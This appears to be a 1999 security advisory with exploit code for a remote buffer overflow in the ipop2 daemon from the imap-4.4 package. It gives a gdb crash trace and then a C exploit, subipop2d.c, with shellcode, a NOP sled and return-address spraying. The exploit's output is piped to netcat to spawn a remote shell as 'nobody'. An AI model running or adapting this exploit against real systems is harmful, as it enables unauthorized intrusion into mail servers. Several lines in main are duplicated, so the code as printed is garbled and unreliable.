Vulnerable Program: POP2 shipped with imap-4.4 package
         Platforms: Linux
            Impact: Remote users can spawn a shell with uid of user "nobody"
 Reported Initally: Chris Evans
      Exploit Code: bind <bind@datasurge.net>


Details:
--------
  POP-2 supports anonymous proxy service where remote users can connect to
remote imap servers and login with a valid l/p. After authenticated with
the imap server, the command "FOLD" with a buffer of 1002 will completely
overwrite eip. Due to the fact that ipop2 sets the uid to nobody's you
cannot spawn a rootshell :(

.
.
(gdb) run
+ POP2 localhost v4.46 server ready
HELO localhost:b4h p4ssw0rd
#0 messages in {localhost:143/imap/user=bind}INBOX
FOLD AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAA......................... (1002 'A's)

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

(gdb) info all-registers
.
.
esp            0xbffff5ec       0xbffff5ec
ebp            0x41414141       0x41414141
esi            0xbffff605       -1073744379
edi            0x80865ca        134768074
eip            0x41414141       0x41414141
.
. 

Exploit Code:
-------------

Pipe output to netcat...

/*
 * subipop2d.c (c) 1999 Subterrain Security
 *
 * Written by bind - June 18, 1999
 *
 * Vulnerable: ipop2 daemons shipped with the imap-4.4 package
 * Compromise: remote users can spawn a shell as user "nobody
 *
 * Greets: vacuum, xdr & cripto...
 *
 * Usage:
 *  ./subipop2 <auth> <user> <pass> [offset] [alignment] [wait]
 *
 * Try offsets -500...500, alignment option should be between 0 and 4
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define RET 0xbffff718
#define NOP 0x90
#define WAIT 20

char shellcode[] = /* shellcode borrowed from plaguez's imapx.c */
  "\xeb\x38\x5e\x89\xf3\x89\xd8\x80\x46\x01\x20\x80\x46\x02\x20\x80"
  "\x46\x03\x20\x80\x46\x05\x20\x80\x46\x06\x20\x89\xf7\x83\xc7\x07"
  "\x31\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
  "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc3\xff\xff\xff\x2f"
  "\x42\x49\x4e\x2f\x53\x48\x00";

int main (int argc, char **argv)
{
  char buf[1002], *auth, *user, *pass;
  int i, offset = 0, align = 0, timeout = WAIT;
  unsigned long addr;

  if (argc < 4)
    {
      printf ("usage: %s <auth> <user> <password> [offset] [alignment]"
              " [wait]\n",
              argv[0]);
      exit (1);
    }

  auth = argv[1];
  user = argv[2];
      exit (1);
    }

  auth = argv[1];
  user = argv[2];
  pass = argv[3];

  if (argc > 4) offset = atoi (argv[4]);
  if (argc > 5) align = atoi (argv[5]);
  if (argc > 6) timeout = atoi (argv[6]);

  addr = RET - offset;

  memset (buf, NOP, 1002);
  memcpy (buf + 500, shellcode, strlen (shellcode));

  for (i = (strlen (shellcode) + (600 + align)); i <= 1002; i += 4)
    *(long *) &buf[i] = addr;

  sleep (2);
  printf ("HELO %s:%s %s\n", auth, user, pass);
  sleep (timeout);
  printf ("FOLD %s\n", buf);

}